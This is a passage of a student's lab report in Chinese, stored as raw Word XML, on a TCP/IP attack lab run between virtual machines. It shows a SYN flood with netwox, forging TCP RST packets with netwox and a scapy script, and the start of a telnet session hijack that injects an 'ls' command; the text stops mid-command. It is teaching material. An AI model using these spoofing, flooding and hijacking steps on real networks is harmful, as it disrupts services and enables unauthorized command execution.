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1B1CC9" w14:textId="6502008B" w:rsidR="00F56CF0" w:rsidRPr="00F56CF0" w:rsidRDefault="00F56CF0" w:rsidP="00F56CF0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I.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F56CF0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>TCP/IP Attack Lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F27695" w14:textId="4EE8B4FB" w:rsidR="00C0589D" w:rsidRPr="00F56CF0" w:rsidRDefault="0072386A" w:rsidP="00F56CF0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F56CF0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="00F56CF0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>ask</w:t>
      </w:r>
      <w:r w:rsidRPr="00F56CF0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F56CF0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F6E0B2" w14:textId="563089A0" w:rsidR="00223F0F" w:rsidRDefault="00223F0F" w:rsidP="00C3763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被攻击主机A的队列长度：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A18EAA9" w14:textId="1F1C99DE" w:rsidR="00223F0F" w:rsidRDefault="00223F0F" w:rsidP="00C3763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779997D" wp14:editId="028C5672">
            <wp:extent cx="4489450" cy="764817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9680" cy="7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8BDA" w14:textId="3ED8188D" w:rsidR="00223F0F" w:rsidRDefault="00223F0F" w:rsidP="00C37630">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3126E460" w14:textId="70FC243C" w:rsidR="000D2A01" w:rsidRDefault="000D2A01" w:rsidP="00C3763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将</w:t>
      </w:r>
      <w:r w:rsidR="00223F0F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击前A的网络连接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>状况输入到log文件进行记录，首先将</w:t>
      </w:r>
      <w:r w:rsidRPr="000D2A01">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>SYN cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>机制关闭，即设置</w:t>
      </w:r>
      <w:r w:rsidRPr="000D2A01">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>net.ipv4.tcp_syncookies=0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00C331E8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>确认A的telnet服务开启：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1406F65B" w14:textId="6A16F9A1" w:rsidR="00C331E8" w:rsidRDefault="00C331E8" w:rsidP="00C3763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053FA85" wp14:editId="0575625C">
            <wp:extent cx="3638550" cy="774057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6674" cy="80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8F8D" w14:textId="77777777" w:rsidR="00DE2354" w:rsidRDefault="00DE2354" w:rsidP="00C37630">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1585C1C1" w14:textId="489CD360" w:rsidR="000D796A" w:rsidRDefault="000D796A" w:rsidP="00C37630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在虚拟机M使用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000D796A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000D796A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000D796A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>netwox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000D796A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> 76 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000D796A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000D796A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.19.145 -p 23</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令，对A进行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>SYN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击，再使虚拟机B尝试telnet登陆A，此时无法再进行登陆：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3852FE2F" w14:textId="0256C395" w:rsidR="000D2A01" w:rsidRDefault="000D796A" w:rsidP="00C3763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92A80A5" wp14:editId="13B7101B">
            <wp:extent cx="3606800" cy="1573337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4162" cy="159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D6D0" w14:textId="77777777" w:rsidR="00DE2354" w:rsidRDefault="00DE2354" w:rsidP="00C37630">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F97075B" w14:textId="6A7700B6" w:rsidR="000D796A" w:rsidRPr="00DE2354" w:rsidRDefault="000D796A" w:rsidP="00C37630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将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A的</w:t>
      </w:r>
      <w:r w:rsidRPr="000D2A01">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>SYN cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>机制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开启</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，即设置</w:t>
      </w:r>
      <w:r w:rsidRPr="000D2A01">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>net.ipv4.tcp_syncookies=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，再进行相同的步骤，</w:t>
      </w:r>
      <w:r w:rsidR="00DE2354">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在进行S</w:t>
      </w:r>
      <w:r w:rsidR="00DE2354">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>YN</w:t>
      </w:r>
      <w:r w:rsidR="00DE2354">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击时仍可以通过telnet连接A：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C032E6" w14:textId="09D2BF70" w:rsidR="00223F0F" w:rsidRDefault="00DE2354" w:rsidP="00C3763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57B59A" wp14:editId="11DED5E6">
            <wp:extent cx="3686175" cy="10287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5F2" w14:textId="224A8FD7" w:rsidR="00DE2354" w:rsidRDefault="00DE2354" w:rsidP="00C37630">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="217CE660" w14:textId="77777777" w:rsidR="00DE2354" w:rsidRPr="000D2A01" w:rsidRDefault="00DE2354" w:rsidP="00C37630">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CC672CE" w14:textId="2C4CEA27" w:rsidR="00C37630" w:rsidRDefault="00C37630" w:rsidP="00C37630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="00DE2354">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>2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26BD159C" w14:textId="238E19CE" w:rsidR="00DE2354" w:rsidRDefault="00DE2354" w:rsidP="007119B4">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如下图，</w:t>
      </w:r>
      <w:r w:rsidR="003370FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主机A和B已建立telnet连接：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444108E5" w14:textId="1D80C2F6" w:rsidR="005B1B3F" w:rsidRDefault="00DE2354" w:rsidP="007119B4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45B7DC54" wp14:editId="54DDCD9C">
            <wp:extent cx="4286250" cy="2797984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490" cy="28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844A" w14:textId="77777777" w:rsidR="000A6238" w:rsidRDefault="000A6238" w:rsidP="007119B4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AEF7F80" w14:textId="54A3A4A1" w:rsidR="003370FB" w:rsidRPr="000A6238" w:rsidRDefault="003370FB" w:rsidP="007119B4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A6238">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>（1）</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A6238">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>netwox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000A6238">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC42A03" w14:textId="18F570A7" w:rsidR="003370FB" w:rsidRDefault="003370FB" w:rsidP="007119B4">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>虚拟机M冒充A向B发送R</w:t>
      </w:r>
      <w:r>
        <w:t>ST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>报文：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE867FD" w14:textId="66927915" w:rsidR="003370FB" w:rsidRDefault="003370FB" w:rsidP="007119B4">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003370FB">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003370FB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003370FB">
        <w:t>netwox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003370FB">
        <w:t xml:space="preserve"> 78 -f "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003370FB">
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003370FB">
        <w:t xml:space="preserve"> host 192.168.19.145"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3BFE23" w14:textId="1144D6E9" w:rsidR="003370FB" w:rsidRDefault="003370FB" w:rsidP="007119B4">
      <w:pPr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host为A的I</w:t>
      </w:r>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址，如下图，telnet通信被关闭。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DD7AC5" w14:textId="229BC3EB" w:rsidR="003370FB" w:rsidRPr="003370FB" w:rsidRDefault="003370FB" w:rsidP="007119B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CB7DA46" wp14:editId="27CCA4DE">
            <wp:extent cx="4349750" cy="297664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139" cy="297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9132" w14:textId="77777777" w:rsidR="00F97799" w:rsidRDefault="00F97799" w:rsidP="007119B4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59FA157B" w14:textId="0AE9DB3E" w:rsidR="00DE2354" w:rsidRPr="000A6238" w:rsidRDefault="003370FB" w:rsidP="007119B4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A6238">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>（2）</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A6238">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>scapy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0FCEAF2A" w14:textId="2437F354" w:rsidR="003370FB" w:rsidRDefault="003F1888" w:rsidP="007119B4">
      <w:p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获得B的端口为4</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00F97799">
        <w:t>656</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，next</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sequence</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>number为</w:t>
      </w:r>
      <w:r w:rsidR="00F97799">
        <w:t>3521313445</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562C14B9" w14:textId="76627AE9" w:rsidR="003370FB" w:rsidRDefault="00F97799" w:rsidP="007119B4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B122E76" wp14:editId="7149FE29">
            <wp:extent cx="3067050" cy="1271104"/>
            <wp:effectExtent l="0" t="0" r="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892" cy="127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E61B" w14:textId="77777777" w:rsidR="000A6238" w:rsidRDefault="000A6238" w:rsidP="007119B4"/>
    <w:p w14:paraId="6591FC13" w14:textId="2BB364C0" w:rsidR="000A6238" w:rsidRDefault="000A6238" w:rsidP="007119B4">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>虚拟机M中的代码为：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4485DBD8" w14:textId="77777777" w:rsidR="00F97799" w:rsidRDefault="00F97799" w:rsidP="00F97799">
      <w:r>
        <w:t xml:space="preserve">#!/usr/bin/python </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4FCFB3" w14:textId="77777777" w:rsidR="00F97799" w:rsidRDefault="00F97799" w:rsidP="00F97799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36DFE4E3" w14:textId="77777777" w:rsidR="00F97799" w:rsidRDefault="00F97799" w:rsidP="00F97799">
      <w:r>
        <w:t>import sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465CB0A8" w14:textId="77777777" w:rsidR="00F97799" w:rsidRDefault="00F97799" w:rsidP="00F97799"/>
    <w:p w14:paraId="6CF1EEDA" w14:textId="77777777" w:rsidR="00F97799" w:rsidRDefault="00F97799" w:rsidP="00F97799">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = IP(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">="192.168.19.145", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">="192.168.19.138") </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18650886" w14:textId="77777777" w:rsidR="00F97799" w:rsidRDefault="00F97799" w:rsidP="00F97799">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = TCP(sport=23, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=45656, flags="R", seq=3521313445,ack=3899643792)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7704C2BC" w14:textId="77777777" w:rsidR="00F97799" w:rsidRDefault="00F97799" w:rsidP="00F97799">
      <w:r>
        <w:t xml:space="preserve">pkt = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAFA022" w14:textId="77777777" w:rsidR="00F97799" w:rsidRDefault="00F97799" w:rsidP="00F97799">
      <w:r>
        <w:t>ls(pkt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B56429" w14:textId="15CF5E69" w:rsidR="000A6238" w:rsidRDefault="00F97799" w:rsidP="00F97799">
      <w:r>
        <w:t>send(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pkt,verbose</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F65AEA5" w14:textId="77777777" w:rsidR="00F97799" w:rsidRDefault="00F97799" w:rsidP="00F97799"/>
    <w:p w14:paraId="734B52C6" w14:textId="6D72BA2D" w:rsidR="000A6238" w:rsidRDefault="000A6238" w:rsidP="000A6238">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在B中使用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可以看到B已接收到伪造的R</w:t>
      </w:r>
      <w:r>
        <w:t>ST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>报文并中断连接。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655D344D" w14:textId="7A0ED021" w:rsidR="00F97799" w:rsidRDefault="00F97799" w:rsidP="000A6238">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2553772E" wp14:editId="2D4D3854">
            <wp:extent cx="5274310" cy="2209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93ED" w14:textId="0C42DAC9" w:rsidR="003F1888" w:rsidRDefault="00F97799" w:rsidP="007119B4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BD0065D" wp14:editId="5FB99414">
            <wp:extent cx="5274310" cy="180784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BD28" w14:textId="77777777" w:rsidR="000A6238" w:rsidRPr="007119B4" w:rsidRDefault="000A6238" w:rsidP="007119B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7922BF97" w14:textId="7612683E" w:rsidR="000B534D" w:rsidRPr="000B534D" w:rsidRDefault="000B534D" w:rsidP="00F34B6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0A6238">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>4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35457EA4" w14:textId="38AF57B7" w:rsidR="009118DD" w:rsidRPr="000A6238" w:rsidRDefault="000A6238" w:rsidP="000A6238">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A6238">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>（1）</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A6238">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>netwox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="25EAA3E2" w14:textId="735A43B5" w:rsidR="000D44FA" w:rsidRPr="000D44FA" w:rsidRDefault="000D44FA" w:rsidP="000A6238">
      <w:r w:rsidRPr="000D44FA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先获取端口和序列号：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDD8921" w14:textId="68E46592" w:rsidR="000A6238" w:rsidRDefault="000D44FA" w:rsidP="000A6238">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="711C58B3" wp14:editId="7A8C9626">
            <wp:extent cx="4159250" cy="123435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631" cy="124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44E" w14:textId="77777777" w:rsidR="00771D4E" w:rsidRDefault="00771D4E" w:rsidP="000A6238"/>
    <w:p w14:paraId="20FB5E7D" w14:textId="6439B073" w:rsidR="00771D4E" w:rsidRDefault="000D44FA" w:rsidP="000A6238">
      <w:r w:rsidRPr="00771D4E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>现欲对服务器A发送ls命令，使其列出目录下所有文件。</w:t>
      </w:r>
      <w:r w:rsidR="00771D4E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ls命令与换行符的1</w:t>
      </w:r>
      <w:r w:rsidR="00771D4E">
        <w:t>6</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00771D4E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进制码为</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00771D4E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：“6c</w:t>
      </w:r>
      <w:r w:rsidR="00771D4E">
        <w:t>730d00</w:t>
      </w:r>
      <w:r w:rsidR="00771D4E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”。</w:t>
      </w:r>
      <w:r w:rsidRPr="000D44FA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在M中运行命令</w:t>
      </w:r>
      <w:r w:rsidR="00771D4E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先发送6c</w:t>
      </w:r>
      <w:r w:rsidRPr="000D44FA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20839FC7" w14:textId="72BEE8F1" w:rsidR="000D44FA" w:rsidRPr="000D44FA" w:rsidRDefault="000D44FA" w:rsidP="000A6238">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000D44FA">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000D44FA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000D44FA">
        <w:t>netwox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000D44FA">
        <w:t xml:space="preserve"> 40 --ip4-dontfrag --ip4-offsetfrag 0 --ip4-ttl 64 --ip4-protocol 6 --ip4-src 192.168.19.138 --ip4-dst 192.168.19.145 --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000D44FA">
        <w:t>tcp-src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000D44FA">
        <w:t xml:space="preserve"> 45588 --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000D44FA">
        <w:t>tcp-dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000D44FA">
